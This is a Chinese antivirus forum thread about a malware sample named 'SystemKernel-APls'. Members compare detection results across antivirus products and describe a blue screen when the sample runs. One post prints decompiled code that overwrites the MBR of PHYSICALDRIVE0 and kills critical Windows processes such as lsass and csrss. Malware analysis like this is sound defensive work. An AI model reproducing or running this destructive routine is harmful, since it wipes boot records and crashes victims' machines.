SystemKernel-APls

显示全部楼层 · 发表于 2019-2-12 11:50:16

安天智甲，killed 。。。管家带BD，MISS 。

显示全部楼层 · 发表于 2019-2-12 13:38:44

www-tekeze 发表于 2019-2-12 11:26
智量Heur杀，火绒miss，有空双击。。

厉害！双击释放一堆文件，全部放行瞬间蓝屏，只能强行关机。。

问题是没有锁机啊，重启后用火绒、智量快速扫描没发现任何风险。。。楼主的样本还得改进下。。

显示全部楼层 · 发表于 2019-2-12 13:43:55

www-tekeze 发表于 2019-2-12 13:38
厉害！双击释放一堆文件，全部放行瞬间蓝屏，只能强行关机。。
问题是没有锁机啊，重启后用火绒 ...

将释放的9个文件放上来大家试试，智量对exe报毒，其它dll都不报。

显示全部楼层 · 发表于 2019-2-12 13:53:54

本帖最后由 2512975065 于 2019-2-12 13:56 编辑

火绒Miss，虚拟机双击蓝屏，估计用vb.net编写
Ollydbg无法分析（打开文件出错）估计反调试或者程序用了蓝屏代码使分析工具不能正常分析

显示全部楼层 · 发表于 2019-2-12 14:05:30

BD：Malicious behavior blocked

显示全部楼层 · 发表于 2019-2-12 14:55:51

www-tekeze 发表于 2019-2-12 13:43
将释放的9个文件放上来大家试试，智量对exe报毒，其它dll都不报。

很清楚
MBR写入垃圾信息显示I am virus! Fuck you :-)',
然后终止系统关键件进程触发蓝屏。

HANDLE __stdcall sub_401100(int a1, int a2, int a3, int a4)
{
  HANDLE result; // eax
  HANDLE v5; // edi
  DWORD BytesReturned; // [esp+8h] [ebp-210h]
  DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-20Ch]
  __int128 Buffer; // [esp+10h] [ebp-208h]
  __int128 v9; // [esp+20h] [ebp-1F8h]
  __int128 v10; // [esp+30h] [ebp-1E8h]
  char Dst; // [esp+40h] [ebp-1D8h]
  __int16 v12; // [esp+20Eh] [ebp-Ah]

  memset(&Dst, 0, 0x1CEu);
  v12 = -21931;
  Buffer = unk_403018;
  v9 = unk_403028;
  v10 = unk_403038;
  result = CreateFileA("\\\\.\\PHYSICALDRIVE0", 0xC0000000, 3u, 0, 3u, 0, 0);
  v5 = result;
  if ( result != (HANDLE)-1 )
  {
DeviceIoControl(result, 0x90018u, 0, 0, 0, 0, &BytesReturned, 0);// FSCTL_LOCK_VOLUME
WriteFile(v5, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
DeviceIoControl(v5, 0x9001Cu, 0, 0, 0, 0, &BytesReturned, 0);// FSCTL_UNLOCK_VOLUME
CloseHandle(v5);
TerminateThisProcess("explorer.exe");
TerminateThisProcess("rundll32.exe");
TerminateThisProcess("taskmgr.exe");
TerminateThisProcess("dwm.exe");
TerminateThisProcess("lsass.exe");
system("shutdown.exe -a");
TerminateThisProcess("winlogon.exe");
TerminateThisProcess("ntoskrnl.exe");
TerminateThisProcess("taskhostw.exe");
TerminateThisProcess("services.exe");
TerminateThisProcess("svchost.exe");
TerminateThisProcess("csrss.exe");
TerminateThisProcess("wininit.exe");
system("taskkill /im lsass.exe /f /t");
system("shutdown.exe -a");
system("taskkill /im ntoskrnl.exe /f /t");
system("taskkill /im svchost.exe /f /t");
system("taskkill /im explorer.exe /f");
TerminateThisProcess("winlogon.exe");
system("taskkill /im winlogon.exe /f /t");
system("taskkill /im csrss.exe /f /t");
result = 0;
  }
  return result;
}

显示全部楼层 · 发表于 2019-2-12 15:10:28

wowocock 发表于 2019-2-12 14:55
很清楚
MBR写入垃圾信息显示I am virus! Fuck you :-)',
然后终止系统关键件进程触发蓝屏。

假期结束了，又到kafan来上班了。。

显示全部楼层 · 发表于 2019-2-12 15:55:16

www-tekeze 发表于 2019-2-12 13:38
厉害！双击释放一堆文件，全部放行瞬间蓝屏，只能强行关机。。
问题是没有锁机啊，重启后用火绒 ...

据作者说以后的版本会破坏硬件

显示全部楼层 · 发表于 2019-2-12 16:06:22

3245076553 发表于 2019-2-12 15:55
据作者说以后的版本会破坏硬件

是吗，像CIH一样还能破坏BIOS？那你放样本时提前说一下，我就不双击了。。

显示全部楼层 · 发表于 2019-2-12 16:08:39

www-tekeze 发表于 2019-2-12 13:43
将释放的9个文件放上来大家试试，智量对exe报毒，其它dll都不报。

不能加个密码先

拒绝访问
无法访问该网页
对象网址:
https://att.kafan.cn/forum.php?mod=attachment&aid=MzAzNjU0NHxlOTk1Y2EzOHwxNTQ5OTU4ODYxfDQxMzgyMnwyMTQyNzc2
原因: 对象被感染 Trojan.Win32.DiskWriter.chx
消息生成时间: 2019/2/12 16:08:15

复制代码

[病毒样本] SystemKernel-APls

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块